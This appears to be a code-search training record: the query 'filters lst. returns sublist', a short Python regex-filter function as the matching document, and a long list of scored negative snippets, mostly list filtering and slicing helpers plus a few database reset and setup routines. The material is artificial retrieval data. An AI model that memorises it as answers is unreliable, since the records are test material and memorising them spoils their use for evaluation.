[ "0.8277952", "0.8237998", "0.821286", "0.8186258", "0.80364215", "0.79730445", "0.78307825", "0.7717235", "0.7714539", "0.7674189", "0.7632501", "0.7603505", "0.75877964", "0.75004154", "0.7474869", "0.74285185", "0.7409626", "0.7409626", "0.73354083", "0.7305028", "0.72556496", "0.71941495", "0.71814173", "0.7154391", "0.71430695", "0.71301305", "0.7106048", "0.71034783", "0.708575", "0.70633376", "0.7062982", "0.70109504", "0.69898564", "0.69842374", "0.698283", "0.6976332", "0.69733", "0.6971408", "0.6960198", "0.6913392", "0.69124246", "0.6910283", "0.69069743", "0.6904465", "0.6892961", "0.6890487", "0.68691504", "0.6867129", "0.68454385", "0.6838666", "0.6836775", "0.6834945", "0.68321633", "0.6828626", "0.6822775", "0.6809209", "0.678551", "0.6765991", "0.6755425", "0.6736579", "0.6732395", "0.6726917", "0.6721095", "0.6720483", "0.66916907", "0.6689817", "0.6680117", "0.66798544", "0.6675807", "0.66755784", "0.6667357", "0.66303897", "0.663017", "0.66281146", "0.66262573", "0.6608776", "0.6597781", "0.6591233", "0.6588271", "0.65765214", "0.65755635", "0.6572124", "0.6569173", "0.6563275", "0.6554915", "0.6537525", "0.6537197", "0.65119535", "0.6508451", "0.65079314", "0.65029764", "0.6499999", "0.64967215", "0.6489922", "0.6482652", "0.6474419", "0.64704734", "0.646518", "0.64639825", "0.64625454", "0.64530057" ]
0.0
-1
filters lst. returns sublist
def filt(seq, lst): regex = "(" + ")|(".join(seq) + ")" regex = re.compile(regex) slst = list(filter(regex.search, lst)) return slst # still need a checkUsername function
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _sublist(self, lst, exclude, length):\n for sublist in itertools.combinations([e for e in lst if e not in exclude], length):\n yield list(sublist)", "def my_filter(function,lst):\n return list(x for x in lst if function(x))", "def filter(lst):\n res = []\n for name in lst:\n if name[1] == 1:\n res.append(name[0])\n return res", "def _filter(self, lst):\n\n lst = list(set(lst)) # removes duplicate items\n if lst is None:\n return []\n arr = []\n for item in lst:\n for typ in [str(g) for g in self.__class__.OBJ_TYPES]:\n if cmds.objectType(item) == typ:\n arr.append(item)\n\n arr.sort(key=lambda x: x.count('|'))\n return arr[::-1] # reverse list", "def filter_list(self, node_list):\n filtered_list = []\n for node in node_list:\n if self.is_member(node):\n filtered_list.append(node)\n return filtered_list", "def filterPick(list, filter, classification):\n y = []\n for job in list:\n x = [(job, classification) for l in job for m in (filter(l),) if m]\n y.append(x)\n return y", "def split_list(items, pred):\n\n thisresult = []\n results = [thisresult]\n for i in items:\n thisresult.append(i)\n if pred(i):\n thisresult = []\n results.append(thisresult)\n return results", "def simple_filter(f, l):\n # a list comprehension with an 'if' clause goes the job nicely\n return [ item for item in l if f(item) ]", "def filter_list(prev_list, current_list, zeta):\n filtered_list = []\n for i, current_val in enumerate(current_list):\n prev_val = prev_list[i]\n filtered_list.append(\n moving_average_filter(current_val, prev_val, zeta))\n return filtered_list", "def subsets(lst):\n\tsubSet = [[]]\n\tfor element in lst:\n\t\tfor s in subSet[:]:\n\t\t\tsubSet.append(s.copy())\n\t\t\ts.append(element)\n\treturn subSet", "def simple_filter_2(f, l):\n # alternative implementation: the same as above, but without comprehension.\n filtered_l = []\n for item in l:\n if f(item):\n filtered_l.append(item)\n return filtered_l\n # I think the list comprehension is not only shorter, but also more\n # readable.", "def sub_list(l):\n r = []\n\n for i in l:\n if type(i) in prims:\n r.append(i)\n elif type(i) is list:\n r.append(sub_list(i))\n elif type(i) is dict:\n r.append(sub_dict(i))\n else:\n print \"Unknown Type: {}\".format(type(i))\n r = sorted(r)\n return r", "def extract_sub_list(mylist, indices):\n return [mylist[ii] for ii in indices]", "def split_list_by(lst, sepfunc, includesep):\n\tblocks = []\n\tblock = []\n\tfor elem in lst:\n\t\tif sepfunc(elem):\n\t\t\tif includesep:\n\t\t\t\tblock.append(elem)\n\t\t\tblocks.append(block)\n\t\t\tblock = []\n\t\telse:\n\t\t\tblock.append(elem)\n\tif len(block):\n\t\tblocks.append(block)\n\treturn blocks", "def partition(lst, pred):\n start = []\n append = start.append\n\n while lst:\n x, lst_ = lst.uncons\n if pred(x):\n break\n lst = lst_\n append(x)\n\n return List(start), lst", "def slice_by_index(lst, indexes):\r\n if not lst or not indexes:\r\n return []\r\n slice_ = itemgetter(*indexes)(lst)\r\n if len(indexes) == 1:\r\n return [slice_]\r\n return list(slice_)", "def sub_lists(my_list):\r\n subs = []\r\n for i in range(0, len(my_list)+1):\r\n temp = [list(x) for x in combinations(my_list, i)]\r\n if len(temp)>0:\r\n subs.extend(temp)\r\n return subs", "def lsThroughFilter(*args, item: Union[AnyStr, List[AnyStr]]=\"\", nodeArray: bool=True, reverse:\n bool=True, selection: bool=True, sort: AnyStr=\"\", **kwargs)->List[AnyStr]:\n pass", "def flat_list(list_: list) -> list:\n return [item for sublist in list_ for item in sublist]", "def split_lst(lst, delimiter, keep_delimiter=True):\n if keep_delimiter:\n append = [delimiter]\n else:\n append = []\n sublists = [list(y) + append\n for x, y \n in itertools.groupby(lst, lambda z: z == delimiter) \n if not x]\n return sublists", "def lst_and_pattern (filer_lst, pattern):\r\n new_filter_lst=[]\r\n for word in filer_lst:\r\n if word_and_pattern(word,pattern):\r\n new_filter_lst.append(word)\r\n return new_filter_lst", "def list_filter(x:int, xs:list) -> list:\n temp = []\n for i in xs:\n if i > x:\n temp.insert(i)\n return temp", "def flattenList(input_list):\r\n return [item for sublist in input_list for item in sublist]", "def filter_list_freq(lst, min_freq):\r\n arr = np.array(lst)\r\n items, count = np.unique(np.array(arr), return_counts=True)\r\n rem_items = items[count < min_freq]\r\n return [i for i in arr[~np.in1d(np.array(arr), rem_items)]]", "def compress_list(src_list):\n return [item for item in src_list if item]", "def filter_list(data: List[dict], field: str, selected: List[str]):\n if len(selected):\n return [x for x in data if x[field] in selected]\n else:\n return data", "def break_list_to_sub_list(self, full_list, chunk_size = 45):\n if chunk_size < 1:\n chunk_size = 1\n return [full_list[i:i + chunk_size] for i in range(0, len(full_list), chunk_size)]", "def flatten_list(l):\n return [item for sublist in l for item in sublist]", "def slice_by_index(lst, indices):\r\n slicer = itemgetter(*indices)(lst)\r\n if len(indices) == 1:\r\n return [slicer]\r\n return list(slicer)", "def nest_sublists(lst, length):\n return [\n [sublist for sublist in lst[index:index+length]]\n for index in range(0, len(lst), length)\n if index <= len(lst)\n ]", "def filtered(self, keys, lst=None, func=\"all\"):\n lst = self if lst is None else lst\n if len(lst) == 0:\n raise ValueError(\"No rows in list\")\n return [row for row in self.filter(keys, lst, func=func)]", "def flatten( liste ) :\n return list(set([ e for sublist in liste for e in sublist ]))\n # TODO :\n # more efficient to use\n # import itertools\n # list(itertools.chain(*list2d))", "def _select_sublist(lst, target):\n ln = len(lst)\n\n # Generate an array that indicates the decision bit for each element in the list.\n # If an element is deterministically true, then no decision bit is needed.\n choice_bits = [None] * ln\n x = 0\n for i in range(0, ln):\n if lst[i][1] not in (target.TRUE, target.FALSE):\n choice_bits[i] = x\n x += 1\n\n # We have 2^x distinct lists. Each can be represented as a number between 0 and 2^x-1=n.\n n = (1 << x) - 1\n\n while n >= 0:\n # Generate the list of positive values and node identifiers\n # noinspection PyTypeChecker\n sublist = [lst[i] for i in range(0, ln)\n if (choice_bits[i] is None and lst[i][1] == target.TRUE) or\n (choice_bits[i] is not None and n & 1 << choice_bits[i])]\n # Generate the list of negative node identifiers\n # noinspection PyTypeChecker\n sublist_no = tuple([target.negate(lst[i][1]) for i in range(0, ln)\n if (choice_bits[i] is None and lst[i][1] == target.FALSE) or (\n choice_bits[i] is not None and not n & 1 << choice_bits[i])])\n if sublist:\n terms, nodes = zip(*sublist)\n else:\n # Empty list.\n terms, nodes = (), ()\n yield terms, nodes + sublist_no + (0,)\n n -= 1", "def flatten_list(in_list):\n return [item for sublist in in_list for item in sublist]", "def genSubset(L):\n if len(L) == 0:\n return [[]] # list of empty list\n smaller = genSubset(L[:-1]) # the list without last element\n extra = L[-1:] # a list of just the last element\n new = []\n for small in smaller:\n new.append(small + extra)\n return smaller + new", "def _subset(lst: list, val_filter: str) -> int:\n \n for i, v in enumerate(lst):\n if v == val_filter:\n return i", "def filter_generic(mt_list, func):\r\n return [mt for mt in mt_list if func(mt)]", "def list_powerset(lst):\n result = [[]]\n for x in lst:\n result.extend([subset + [x] for subset in result])\n result.pop(0)\n return result", "def flatten(l):\n return [item for sublist in l for item in sublist]", "def flatten(l):\n return [item for sublist in l for item in sublist]", "def filtreDsup2(liste):\r\n l=[]\r\n for i in range(len(liste)):\r\n if liste[i][5]>=2: l.append(i)\r\n return l", "def filter(self, fn):\r\n\t\treturn FilterProjectedList(self, [fn])", "def FilterConfrontationList(C, match_list):\n if len(match_list) == 0:\n return C\n Cf = []\n for c in C:\n for match in match_list:\n if match in c.longname:\n Cf.append(c)\n return Cf", "def slice_list(list_to_slice, *upper_bounds):\n list_to_return=[]\n for upper_bound in upper_bounds:\n if (len(list_to_slice)>upper_bound):\n print('Slicing...')\n list_to_return.append(list_to_slice[:upper_bound])\n else:\n list_to_return.append(None)\n \n return list_to_return", "def dividelists(oldlst, tweet):\n for each in oldlst:\n if each == tweet:\n print('REMOVED', each[0], each[1], each[2], each[3])\n print('true:', each)\n oldlst.remove(each)\n print('each:', each)\n else:\n print('wut')\n pass\n return oldlst", "def get_subset(mlist,year):\n newlist = []\n for entry in mlist:\n if int(entry[0][:4]) > int(year):\n continue\n newvec = entry[:8]\n citations = entry[8]['citations']\n citations = filter(lambda a: int(a[:4]) <= int(year), citations)\n newvec[2] = len(citations)\n newlist.append(newvec)\n return newlist", "def subset_of_list(alist, n, t):\n if t < 1 or t > n:\n raise Exception(f't={t} is not accept, must be 1-N (include)')\n\n if n > len(alist): # if n is bigger than all list, return only 1 for t<=len\n if t <= len(alist):\n return [alist[t - 1]]\n else:\n return None\n\n m = int(len(alist) / n) # each task of a section of list\n\n start_index = int((t - 1) * m)\n if t == n:\n sublist = alist[start_index:]\n else:\n sublist = alist[start_index:start_index + m]\n # logger.debug(f'n={n}, t={t}, section={m}, index={start_index}:{start_index + m}')\n return sublist", "def flat_list_of_lists(l):\n return [item for sublist in l for item in sublist]", "def multiListSlice(lol, index):\n divisor = 1\n values = []\n for i in range(0, len(lol)):\n index = (index / divisor) % len(lol[i])\n values[i] = lol[i][index]\n divisor *= len(lol[i])\n return values", "def filtreSpeciales(liste):\r\n l=[]\r\n for i in range(len(liste)):\r\n if liste[i][0]==0: l.append(i)\r\n return l", "def slice_list(in_list, lens):\n if isinstance(lens, int):\n assert len(in_list) % lens == 0\n lens = [lens] * int(len(in_list) / lens)\n if not isinstance(lens, list):\n raise TypeError('\"indices\" must be an integer or a list of integers')\n elif sum(lens) != len(in_list):\n raise ValueError(\n \"sum of lens and list length does not \"\n f\"match: {sum(lens)} != {len(in_list)}\"\n )\n out_list = []\n idx = 0\n for i in range(len(lens)):\n out_list.append(in_list[idx : idx + lens[i]])\n idx += lens[i]\n return out_list", "def split_registrations(list_of_registrations):\n list_of_registrations.sort(key=lambda registration: registration.service)\n\n sub_list = []\n main_list = []\n previous = list_of_registrations[0]\n\n for registration in list_of_registrations:\n if previous.service == registration.service:\n sub_list.append(registration)\n else:\n main_list.append(sub_list)\n sub_list = [registration]\n previous = registration\n\n main_list.append(sub_list)\n return main_list", "def remove_every_other(lst):\n return [ea for ea in lst if lst.index(ea) % 2 == 0 ]", "def filter(self, callback: Callable) -> 'List':\n if not callable(callback):\n raise ValueError('The callback should be callable')\n\n return List(item for item in self if callback(item))", "def slice(list, point):\n index = list.index(point)\n slices = []\n \n slices.append(list[:index])\n slices.append(list[index + 1:])\n \n return slices", "def filtered(self, func):\n return PSetList(list(filter(func, self.sets)))", "def flatten(ls):\r\n return [item for sublist in ls for item in sublist]", "def filter(list_tweets):\n for index, item in enumerate(list_tweets):\n if isinstance(item, list):\n print(item)\n list_tweets[index] = item[0]\n return list_tweets", "def filter_fn(arr):\n return lambda l: ([n for n in arr if n == l])", "def big_selections(lst: List[int], n: int) -> List[List[int]]:\n if not lst:\n return [[]]\n else:\n holder = [lst.copy()]\n for i in range(len(lst)):\n l2 = lst.copy()\n l2.pop(i)\n for item in selections(l2):\n if item not in holder and sum(item) >= n:\n holder.append(item)\n return holder", "def prune_empty(lst: List[T]) -> List[T]:\n return [elem for elem in lst if elem]", "def filter_list(l):\n return list(filter(lambda x: type(x) == int, l))", "def filter(self, filters:list)->list:\n for item in self.list:\n use_item = True\n for filter in filters:\n filter_key, filter_value, filter_type = filter\n if filter_type == \"<\" and item[filter_key] >= filter_value:\n use_item = False\n break\n elif filter_type == \">\" and item[filter_key] <= filter_value:\n use_item = False\n break\n elif filter_type == \"<=\" and item[filter_key] > filter_value:\n use_item = False\n break\n elif filter_type == \">=\" and item[filter_key] < filter_value:\n use_item = False\n break\n elif filter_type == \"=\" and not item[filter_key] == filter_value:\n use_item = False\n break\n if use_item:\n yield item", "def cfilter(func,iterable):\n result = []\n\n for i in iterable:\n\n if func(i) == True:\n result.append(i)\n\n return result", "def Filter(self,val):\n \n #set th elength of the lis to 0\n List = [self.InitialList[i] for i in range(0,len(self.InitialList))]\n FilterValues = [None]\n Grab = [None]\n Headers = []\n \n #create the quick index\n for i in range(len(self.Condensensed)):\n \n Headers.append([self.Condensensed[i][l][0] for l in range(len(self.Condensensed[i]))])\n \n #grab the values...\n for j in range(len(self.Variables)):\n \n FilterValues.append(self.Variables[j].get())\n\n if self.Variables[j].get().split(' ')[0] == 'All':\n \n Grab.append(False)\n \n else:\n \n Grab.append(True)\n \n #intermediate list to compare\n ToCompare = []\n \n for i in range(1,len(Grab)):\n \n if Grab[i]:\n \n #find the index\n l = Headers[i].index(FilterValues[i])\n \n #grab it\n ToCompare.append([self.Condensensed[i][l][m] for m in range(len(self.Condensensed[i][l]))])\n\n\n for i in range(0, len(ToCompare)):\n \n List = list(set(List).intersection(ToCompare[i]))\n\n #update the interface\n self.Gatherer(List,list(self.Input))\n self.BuildTree()", "def flatten_list(lst):\n assert isinstance(lst, list), \"you didn't pass a list!\"\n\n if isinstance(lst[0], list):\n if len(lst[0])>1:\n return ['-'.join(i) for i in lst] # then its a kpoints list\n return flatten_list([i[0] for i in lst])\n else:\n return [i for i in lst]", "def flatten(src):\n return [item for sublist in src for item in sublist]", "def partition_list(lis, threshold):\n chunk, partial = [], 0\n idx = 0\n while idx < len(lis):\n if lis[idx].size < threshold:\n while partial < threshold and idx < len(lis):\n chunk.append(lis[idx])\n partial += lis[idx].size\n idx += 1\n\n yield chunk\n chunk, partial = [], 0\n else:\n yield lis[idx]\n idx += 1", "def sub(a_list: list[int], b: int, c: int) -> list[int]:\n list_returned: list[int] = []\n while len(a_list) == 0:\n if b > len(a_list) or c <= 0:\n return []\n if b < 0:\n list_returned.append(a_list[0])\n else:\n list_returned.append(a_list[b])\n if c > len(a_list):\n list_returned.append(a_list[len(a_list) - 1])\n else:\n list_returned.append(a_list[c - 1])\n return list_returned", "def concat_list(lst, batch_flags=None):\n slices = [slice(0)] * len(lst)\n datas = []\n row_flag = 0\n for i, r in enumerate(lst):\n if r is None:\n slices[i] = None\n continue\n j = -1\n if batch_flags is None or batch_flags[i]:\n for j, d in enumerate(r):\n datas.append(d)\n slices[i] = slice(row_flag, row_flag + j + 1)\n else:\n datas.append(r)\n slices[i] = row_flag\n row_flag += j + 1\n return datas, slices", "def mutate_list_2(lst):\r\n elem = lst[0]\r\n lst.remove(elem)\r\n lst.append(elem)\r\n return lst", "def get_slice_from_list(self,list_,start=0,end=None):\r\n start = self._index_to_int(start,True)\r\n if end is not None:\r\n end= self._index_to_int(end)\r\n\r\n return list_[start:end]", "def split_list(l, k):\n\n\tn = len(l)\n\tsublists = []\n\tnsubs = n / k\n\tnrems = n % k\n\n\t# little algo to split lists.\n\n\ti = int(0)\n\twhile i < n:\n\t\tsublists.append(l[i:i+k])\n\t\ti += k\n\n\treturn sublists", "def check_list(list_obj, limit):\r\n if len(list_obj) > limit:\r\n num_of_lists = int(len(list_obj) / limit) + 1\r\n sublist = []\r\n k = 0\r\n while k < num_of_lists:\r\n x = list_obj[limit*k:limit*(k+1)]\r\n sublist.append(x)\r\n k += 1\r\n\r\n return sublist\r\n\r\n return list_obj", "def filter(self, fn: Callable[[Tuple[K, List[V]]], bool]) -> Iterator[Tuple[K, List[V]]]:\n return (entry for entry in iter(self) if fn(entry))", "def filter_subspans(spans: List[Tuple[int, int]]) -> List[Tuple[int, int]]:\n filtered = []\n\n for span in spans:\n accept = True\n for compared in spans:\n if span[0] >= compared[0] and span[1] <= compared[1]:\n if span[0] != compared[0] or span[1] != compared[1]:\n accept = False\n if accept:\n filtered.append(span)\n\n filtered = list(dict.fromkeys(filtered)) # remove duplicates if present\n\n return filtered", "def powerset(lst):\n return reduce(lambda rslt, x: rslt + [subset + [x] for subset in rslt],\n lst, [[]])", "def build_extracted_list(input_list, subinterval):\n out = []\n wait = subinterval\n for i in input_list:\n if wait == subinterval:\n out.append(i)\n wait = 0\n else:\n wait += 1\n return out", "def flatten(lol ):\n return [item for sublist in lol for item in sublist]", "def _get_subgroups(self):\n groups = [] # array of arrays\n for i in range(self.filter.shape[0]):\n for j in range(i):\n if self.filter[i][j]:\n if len(groups) < 1:\n groups.append([j, i])\n continue\n found = False\n for group_i, _ in enumerate(groups):\n if i in groups[group_i]:\n if j not in groups[group_i]:\n groups[group_i].append(j)\n found = True\n elif j in groups[group_i]:\n if i not in groups[group_i]:\n groups[group_i].append(i)\n found = True\n if not found:\n groups.append([i, j])\n return groups", "def apply_function_to_nested_list(func, l):\n from itertools import chain\n result = func(list(chain(*l)))\n csum = np.cumsum(map(len, l))\n new_l = [result[(0 if i == 0 else csum[i-1]):csum[i]] for i in range(len(l))]\n return new_l", "def getall(l, idx):\n return [l[i] for i in idx]", "def subset(arr, start, end):\n return [[row_data for row_data in row[start[1]:end[1]]] for row in arr[start[0]:end[0]]]", "def _strip_list(list):\n return [x for x in list if x]", "def flatten_lists(lst):\n return list(chain(*lst))", "def slice_list(input, size):\n input_size = len(input)\n slice_size = input_size // size\n remain = input_size % size\n result = []\n iterator = iter(input)\n for i in range(size):\n result.append([])\n for j in range(slice_size):\n result[i].append(next(iterator))\n if remain:\n result[i].append(next(iterator))\n remain -= 1\n return result", "def flattenList(l=None):\r\n flat_list = [item for sublist in l for item in sublist]\r\n return flat_list", "def Students_at_level(l:list,c:str)->list:\n result=[]\n for s in l:\n if s.level==c:\n result.append(s)\n return result", "def ft_filter(function_to_apply, list_of_inputs):\n if not callable(function_to_apply):\n exit(\"First param should be a Function\")\n try:\n object_iter = iter(list_of_inputs)\n except TypeError:\n exit(\"Second Argument must be iterable\")\n lst = []\n for item in list_of_inputs:\n if function_to_apply(item) == True: \n lst.append(item)\n return lst", "def custom_filter(some_func, iterator_list):\n\n local_iterator = from_input_to_list(iterator_list)\n func_map = [some_func(i) for i in local_iterator]\n true_list = [j for j in func_map if j > 100] # here we can hardcode any condition\n\n return true_list", "def _filter(self, filter_condition):\n def _inner_filter(item: list):\n return self._default_filter(item, filter_condition)\n\n self._result = list(filter(_inner_filter, self._data))", "def sublist(a, b):\n r = a[:]\n for i in b:\n r.remove(i)\n return r", "def filter_marks(lst):\n integers = []\n rest = []\n\n for ele in lst: # interate over list\n\n # 'type' will returns type of element\n # if type of element is integer append\n # element to integers list\n if type(ele) is int:\n integers.append(ele)\n else:\n # otherwise append in rest list\n rest.append(ele)\n\n # multiple comma seprated values are returned\n # as tuple in python\n return integers, rest", "def clean_list(lst, element_type='way'):\n return [clean_element(e, element_type=element_type) for e in lst]", "def __partition(self, lst, n):\n \n if lst is None:\n lst = []\n \n division = len(lst)/float(n)\n \n return [ lst[int(round(division * i)):\n int(round(division * (i+1)))] for i in xrange(int(n))]", "def remove_elements(l, e):\n return [x for x in l if x != e]", "def get_filter_results (twitter_data, search_list, filter_data):\n\n #initialize\n filter_list = []\n\n for operation in filter_data:\n if operation == 'name-includes':\n for username in search_list:\n # since case doesnt matter, eveything is made uppercase and\n # then is checked\n if filter_data [operation].upper() in \\\n twitter_data [username]['name'].upper():\n filter_list.append (username)\n\n elif operation == 'location-includes':\n for username in search_list:\n # same case as above\n if filter_data [operation].upper() in \\\n twitter_data [username]['location'].upper():\n filter_list.append (username)\n\n elif operation == 'follower':\n for username in search_list:\n if username in \\\n twitter_data[filter_data [operation]]['following']:\n filter_list.append (username)\n\n elif operation == 'following':\n for username in search_list:\n if username in all_followers(twitter_data, filter_data[operation]):\n filter_list.append (username)\n\n search_list = filter_list\n filter_list = []\n\n filter_list = search_list\n filter_list.sort() # sort the list alphabetically for testing purposes\n\n return filter_list", "def makelist(count, lista):\n if count <= 8:\n return makelist(count+1, lista+[(int(input()))])\n print(*list(filter(lambda x: x%2 == 0, lista)))", "def filter(iteratee, seq):\n return _filter(fnc.iteratee(iteratee), seq)", "def list_by_re_pattern(list_to_be_splited, pattern):\n return [(i, val) for i, val in enumerate(list_to_be_splited)\n if match(pattern, val)]" ]
[ "0.674777", "0.67473686", "0.6627806", "0.63558894", "0.63215184", "0.6267986", "0.6242654", "0.6209429", "0.6174839", "0.60629857", "0.6052656", "0.5999534", "0.596492", "0.59513366", "0.59276193", "0.59161556", "0.58984244", "0.58968115", "0.5890496", "0.5857357", "0.5817321", "0.57994425", "0.57694507", "0.57664037", "0.56926835", "0.56393397", "0.5614123", "0.5606712", "0.56009465", "0.55927694", "0.55923766", "0.55818695", "0.5574288", "0.55656666", "0.55626595", "0.55594295", "0.55522", "0.54796565", "0.5462819", "0.5462819", "0.54502374", "0.54450524", "0.5440648", "0.5425161", "0.54111737", "0.54033947", "0.54014534", "0.5389343", "0.53841424", "0.5381395", "0.5375043", "0.53660077", "0.5357476", "0.53567415", "0.53519046", "0.53471065", "0.5346417", "0.5331282", "0.5298437", "0.52949816", "0.5292878", "0.5289552", "0.52838176", "0.52799267", "0.5279266", "0.52555686", "0.5254482", "0.5247823", "0.5232848", "0.52274626", "0.52090126", "0.5201376", "0.51950634", "0.51854366", "0.5182156", "0.5175536", "0.5134149", "0.5133744", "0.5124333", "0.5122465", "0.5091875", "0.508589", "0.5068351", "0.5065897", "0.50656605", "0.5064823", "0.506298", "0.50621146", "0.5058944", "0.50462806", "0.50420344", "0.5037218", "0.50275123", "0.50067174", "0.5005729", "0.5004472", "0.4995479", "0.49934635", "0.49910033", "0.4985135" ]
0.54409194
42
Readd a user's postgresql database.
def _add_postgresql(user, options, dump = None): if dump is not None: pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def postgres_rebuild(name=None, user=None):\n name = check(name, 'name: The dabatase name to create.')\n user = check(user, 'user: the user to grant privileges.')\n\n drop_postgres_db(name=name, user=user)\n create_postgres_db(name=name, user=user, password=password)", "def recreate_db():\n drop_db()\n create_db()", "def recreate_db():\n drop_db()\n create_db()\n populate_db()", "def reset_db():\n \n if not env.environment == 'staging':\n abort('reset_db requires the staging environment.')\n answer = prompt('Are you sure you want to drop and re-create the database?', default='n')\n if answer == 'y':\n sudo('dropdb %(database_name)s' % env, user='postgres')\n create_db()\n mgmt('syncdb', '--migrate')\n else:\n abort('Aborting...')", "def postgres_drop(name=None, user=None):\n name = check(name, 'name: The dabatase name to create.')\n user = check(user, 'user: the user to grant privileges.')\n\n postgres_run((\n \"drop database if exists {name}\",\n \"drop role if exists {user}\"\n ), {'name': name, 'user': user})", "def reset_db():\n\n webapp.dbsql.drop_all()\n webapp.dbsql.create_all()\n webapp.dbsql.session.commit()", "def rebuild_db():\n delete_db()\n create_db()\n insert_db()", "def create_database():\n db_user = 'expensetracker' # define these\n db_pass = 'beta'\n db_table = 'expensetracker'\n\n local('psql -U postgres -c \"DROP ROLE IF EXISTS %s\"'%db_user)\n local('psql -U postgres -c \"CREATE USER %s WITH NOCREATEDB NOCREATEUSER ENCRYPTED PASSWORD E\\'%s\\'\"' % (db_user, db_pass))\n local('psql -U postgres -c \"DROP DATABASE IF EXISTS %s\"'%db_table)\n local('psql -U postgres -c \"CREATE DATABASE %s WITH OWNER %s\"' % (\n db_table, db_user))", "def upgrade_app_db(app, user):\n ctx.logger.info('Upgrading %s DB', app.capitalize())\n run('db-migrate', app, user)", "def post_install_postgresql():\n from django.conf import settings as s\n with settings(warn_only=True):\n sudo('/etc/init.d/postgresql-8.4 restart')\n sudo(\"psql template1 -c \\\"ALTER USER postgres \" \\\n \"with encrypted password '%s';\\\" \" % env.password,\n user='postgres')\n sudo(\"psql -f /usr/share/postgresql/8.4/contrib/adminpack.sql\",\n user='postgres')\n if (s.DATABASES['default']['ENGINE'] ==\n 'django.db.backends.postgresql_psycopg2'):\n sudo(\"psql template1 -c \\\"CREATE ROLE %s LOGIN with \" \\\n \"encrypted password '%s';\\\" \" % (\n s.DATABASES['default']['USER'],\n s.DATABASES['default']['PASSWORD'],\n ),\n user='postgres')\n sudo('createdb -T template0 -O %s %s' % (\n s.DATABASES['default']['USER'],\n s.DATABASES['default']['NAME'],\n ),\n user='postgres')\n\n print \"* setup postgres user password with your \" \\\n \"'%s' password\" % env.user\n print \"* imported the adminpack\"\n print \"Post install setup of Postgresql complete!\"", "def resetdb():\n\n if database_exists(DB_URL):\n print('Deleting database.')\n drop_database(DB_URL)\n if not database_exists(DB_URL):\n print('Creating database.')\n create_database(DB_URL)\n\n print('Creating tables.')\n db.create_all()\n print('Shiny!')", "def setup_db(self):\n\n with cd(\"/var/lib/postgresql\"):\n with settings(warn_only=True):\n sudo(\"psql -c \\\"CREATE USER {0} WITH PASSWORD '{1}';\\\"\".format(config.get(\"postgres_user\", self.app_name), config.get(\"postgres_password\", self.app_name)), user=\"postgres\")\n sudo(\"createdb {0}\".format(self.db_name), user=\"postgres\")\n sudo(\"psql -c \\\"GRANT ALL PRIVILEGES ON DATABASE {0} TO {1};\\\"\".format(self.db_name, config.get(\"postgres_user\", self.app_name)), user=\"postgres\")", "def mysql_rebuild(name=None, user=None, password=None, host=None,\n db_password=None, port=''):\n name = check(name, 'name: the database name to create.')\n user = check(user, 'user: the user to grant privileges')\n password = check(password, 'password: user\\'s password')\n host = check(host, 'host: machine ', 'mysql_host', default='localhost')\n db_password = check(db_password, 'db_password: mysql password.')\n port == ':'+port if port is not '' else ''\n\n drop_postgres_db(name=name, user=user, db_password=db_password)\n create_postgres_db(name=name, user=user, password=password, host=host,\n db_password=db_password, port=port)", "def clear_db(app, user):\n ctx.logger.info('Clearing %s DB', app.capitalize())\n run('db-migrate-clear', app, user)", "def populate_db():\n try:\n users = [\n User(name=u'admin', role=1),\n ]\n db.session.add_all(users)\n db.session.commit()\n except:\n db.session.rollback()\n raise Exception(\"Failed to populate the database\")\n finally:\n db.session.close()", "def remove_database(cls, database_name):\n cls.log.info('Removing database: {}'.format(database_name))\n cls.conn.drop_database(database_name)\n cls.log.info('Database successfully removed.')", "def add_user_sql(self, lncdsql):\n add_user = (\n \"\"\"\n create role %(ra)s with LOGIN REPLICATION password NULL;\n GRANT ALL PRIVILEGES ON DATABASE lncddb TO %(ra)s;\n grant all privileges on all tables in schema public to %(ra)s;\n grant all privileges on all functions in schema public to %(ra)s;\n grant all privileges on all sequences in schema public to %(ra)s;\n \"\"\"\n % self.ra_data\n )\n\n admin_user = \"postgres\"\n user_pass = PasswordDialog.user_pass(\n QtWidgets.QApplication.instance(), admin_user\n )\n if not user_pass[\"pass\"]:\n mkmsg(\"get admin to run\\n\\n %s\" % add_user)\n return\n constr = {**lncdsql.config, \"user\": admin_user, \"password\": user_pass[\"pass\"]}\n dbcon = make_connstr(constr)\n conn = psycopg2.connect(constr)\n conn.set_session(autocommit=True)\n didadd = catch_to_mkmsg(conn.execute, add_user)\n # TODO: cache admin password?\n conn.close()\n return didadd", "def create_database():\n # Depending on your local settings, you may need to specify a user and password, e.g.\n # conn = psycopg2.connect(dbname=\"postgres\", user=\"postgres\", password=\"password\")\n conn = psycopg2.connect(dbname=\"postgres\")\n conn.autocommit = True # it seems this mode is needed to make a db\n conn.set_isolation_level(0) # also this for dropping db\n\n # un-comment this line if you already have a database called\n # `opportunity_youth` and you want to drop it\n # execute_sql_script(conn, \"01_drop_old_database.sql\")\n execute_sql_script(conn, \"02_create_new_database.sql\")\n\n conn.close()", "def remove_database(dbname: str) -> None:\n # Initialize connection.\n connection, cursor = hsql.get_connection(\n dbname=os.environ[\"POSTGRES_DB\"],\n host=os.environ[\"POSTGRES_HOST\"],\n port=int(os.environ[\"POSTGRES_PORT\"]),\n user=os.environ[\"POSTGRES_USER\"],\n password=os.environ[\"POSTGRES_PASSWORD\"],\n )\n # Drop database.\n cursor.execute(psql.SQL(\"DROP DATABASE {};\").format(psql.Identifier(dbname)))\n # Close connection.\n connection.close()", "def set_db_details(db, db_username, db_password):\n set_db_user_access(db_username)\n create_db_user(db_username, db_password)\n create_db(db, db_username)\n restart_db()\n restart_IA()\n create_IA_metauser(db)\n print color_text(\"Postgres is configured.\", GOOD)", "def recreate_db():\n db.session.execute('SET FOREIGN_KEY_CHECKS=0;')\n db.session.execute('DROP TABLE IF EXISTS logs;')\n db.session.execute('DROP TABLE IF EXISTS employees;')\n db.session.execute('DROP TABLE IF EXISTS sales;')\n db.session.execute('DROP TABLE IF EXISTS plants;')\n db.session.execute('DROP TABLE IF EXISTS products;')\n db.session.execute('DROP TABLE IF EXISTS suppliers;')\n db.session.execute('DROP TABLE IF EXISTS orders;')\n db.session.execute('DROP TABLE IF EXISTS contacts;')\n db.session.execute('DROP TABLE IF EXISTS varieties;')\n db.session.execute('DROP TABLE IF EXISTS species;')\n db.session.execute('DROP TABLE IF EXISTS genera;')\n db.session.execute('DROP TABLE IF EXISTS families;')\n 